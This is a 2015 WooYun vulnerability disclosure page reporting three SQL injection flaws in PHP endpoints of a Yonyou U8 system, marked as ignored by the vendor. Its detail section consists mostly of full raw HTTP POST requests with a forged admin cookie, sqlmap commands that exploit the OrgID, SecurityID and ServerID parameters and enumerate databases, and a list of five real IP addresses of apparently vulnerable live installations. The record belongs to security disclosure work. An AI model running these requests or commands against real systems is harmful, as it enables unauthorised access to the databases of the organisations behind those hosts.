当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124970

漏洞标题:用友优普U8系统三处SQL注射漏洞

相关厂商:用友软件

漏洞作者: 路人甲

提交时间:2015-07-07 10:18

修复时间:2015-10-10 10:21

公开时间:2015-10-10 10:21

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-07: 细节已通知厂商并且等待厂商处理中
2015-07-12: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-09-05: 细节向核心白帽子及相关领域专家公开
2015-09-15: 细节向普通白帽子公开
2015-09-25: 细节向实习白帽子公开
2015-10-10: 细节向公众公开

简要描述:

用友某系统两处SQL注射漏洞

详细说明:

前面有人提交这系统的漏洞

 WooYun: 用友优普U8某系统两处SQL注入(无需登录DBA权限83案例) 


搜索了好久终于找到了案例,于是乎漏洞来了。。。
总共三处漏洞,
0x01
SQL注入一
/Server/CmxUserGroup.php?pgid=Group_DelUserOK UserID=1&OrgID=1

POST /Server/CmxUserGroup.php?pgid=Group_DelUserOK HTTP/1.1
Referer: http://218.27.137.242:8080/
Cookie: RAS_Admin_UserInfo_UserName=1
Host: 218.27.137.242:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
UserID=1&OrgID=1


sqlmap.py -r p1.txt -p OrgID --dbms mysql

1.png


0x02
SQL注入二
/Server/CmxSecurity.php?pgid=Security_AddUser

POST /Server/CmxSecurity.php?pgid=Security_AddUser&SearchFlag=true HTTP/1.1
Referer: http://218.27.137.242:8080/
Cookie: RAS_Admin_UserInfo_UserName=1
Host: 218.27.137.242:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
SecurityID=1


sqlmap.py -r p1.txt -p SecurityID --dbms mysql

1.png


0x03
SQL注入三
/Server/CmxServer.php?pgid=Server_UpdateSave

POST /Server/CmxServer.php?pgid=Server_UpdateSave HTTP/1.1
Referer: http://218.27.137.242:8080/
Cookie: RAS_Admin_UserInfo_UserName=1
Host: 218.27.137.242:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
ServerID=1


sqlmap.py -r p1.txt -p ServerID --dbms mysql

3.png


案例很多,随便给5个:
http://218.27.137.242:8080/
http://222.177.213.190:8888/
http://117.132.15.88:8001/
http://221.224.116.210:81/
http://221.238.243.237:8000/

漏洞证明:

sqlmap.py -r p1.txt -p ServerID --dbms mysql --dbs

a.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-10 10:21

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无